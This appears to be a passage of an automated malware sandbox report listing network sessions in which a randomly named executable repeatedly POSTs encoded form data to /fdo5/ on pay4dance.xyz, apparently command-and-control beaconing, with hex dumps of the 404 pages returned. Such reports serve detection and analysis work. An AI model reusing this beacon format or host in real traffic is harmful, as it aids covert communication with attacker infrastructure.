6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                              Dec 3, 2023 16:26:39.164772987 CET193INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.44974966.29.155.54802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:44.735837936 CET721OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.pay4dance.xyz
                                                                                              Referer: http://www.pay4dance.xyz/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 30 52 31 52 49 42 66 57 6a 2f 35 52 54 35 75 2f 35 34 4b 69 39 6b 38 2b 70 31 59 39 32 6d 75 4a 39 76 45 45 4a 50 70 64 44 50 5a 6c 42 78 37 79 58 33 6d 79 70 6f 4b 33 4b 4c 71 61 6f 58 75 6e 4b 4f 41 6f 33 6f 67 36 59 70 43 36 49 2b 54 30 33 2f 4d 70 6c 6a 51 4f 57 71 62 71 69 70 36 69 74 35 68 4e 61 66 75 44 71 59 5a 58 71 72 61 38 53 32 45 4a 32 31 44 4f 50 53 53 66 6f 6a 76 6e 73 4a 78 77 78 67 67 76 34 31 2f 48 6e 2b 71 57 52 41 46 31 33 63 58 61 46 76 72 35 57 4e 4b 4c 31 70 77 72 30 43 4d 58 64 6c 5a 35 33 59 4f 57 6d 67 3d 3d
                                                                                              Data Ascii: 540H2x=0R1RIBfWj/5RT5u/54Ki9k8+p1Y92muJ9vEEJPpdDPZlBx7yX3mypoK3KLqaoXunKOAo3og6YpC6I+T03/MpljQOWqbqip6it5hNafuDqYZXqra8S2EJ21DOPSSfojvnsJxwxggv41/Hn+qWRAF13cXaFvr5WNKL1pwr0CMXdlZ53YOWmg==
                                                                                              Dec 3, 2023 16:26:45.033732891 CET1340INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:44 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                              Dec 3, 2023 16:26:45.033751965 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                              Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                              Dec 3, 2023 16:26:45.033763885 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                              Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                              Dec 3, 2023 16:26:45.033777952 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                              Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                              Dec 3, 2023 16:26:45.033993959 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                              Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.44975066.29.155.54802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:47.421148062 CET741OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.pay4dance.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.pay4dance.xyz
                                                                                              Referer: http://www.pay4dance.xyz/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 30 52 31 52 49 42 66 57 6a 2f 35 52 53 5a 65 2f 2b 66 2b 69 2f 45 38 35 77 46 59 39 67 57 75 4e 39 76 34 45 4a 4b 5a 4e 43 38 39 6c 42 52 4c 79 46 7a 79 79 75 6f 4b 33 43 72 71 66 6c 33 75 75 4b 4f 38 67 33 70 4d 36 59 70 47 36 49 38 62 30 33 4d 55 71 6e 7a 51 4d 65 4b 62 6b 76 4a 36 69 74 35 68 4e 61 66 36 39 71 59 42 58 71 34 43 38 41 53 51 47 31 31 44 42 62 43 53 66 6c 44 76 37 73 4a 78 6f 78 6c 46 34 34 32 48 48 6e 38 43 57 52 53 74 36 35 63 58 44 42 76 71 5a 51 65 33 53 77 36 52 7a 79 43 34 49 44 42 4e 6e 32 4e 69 46 68 62 6b 4d 51 65 77 69 49 45 41 5a 61 59 47 6c 6d 42 4f 39 48 72 59 3d
                                                                                              Data Ascii: 540H2x=0R1RIBfWj/5RSZe/+f+i/E85wFY9gWuN9v4EJKZNC89lBRLyFzyyuoK3Crqfl3uuKO8g3pM6YpG6I8b03MUqnzQMeKbkvJ6it5hNaf69qYBXq4C8ASQG11DBbCSflDv7sJxoxlF442HHn8CWRSt65cXDBvqZQe3Sw6RzyC4IDBNn2NiFhbkMQewiIEAZaYGlmBO9HrY=
                                                                                              Dec 3, 2023 16:26:47.689701080 CET1340INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:26:47 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 5278
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                              Dec 3, 2023 16:26:47.689726114 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                              Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                              Dec 3, 2023 16:26:47.689738035 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                              Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                              Dec 3, 2023 16:26:47.689752102 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                              Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                                              Dec 3, 2023 16:26:47.690017939 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                                              Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.44975166.29.155.54802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:50.107712030 CET10823OUTPOST /fdo5/ HTTP/1.1
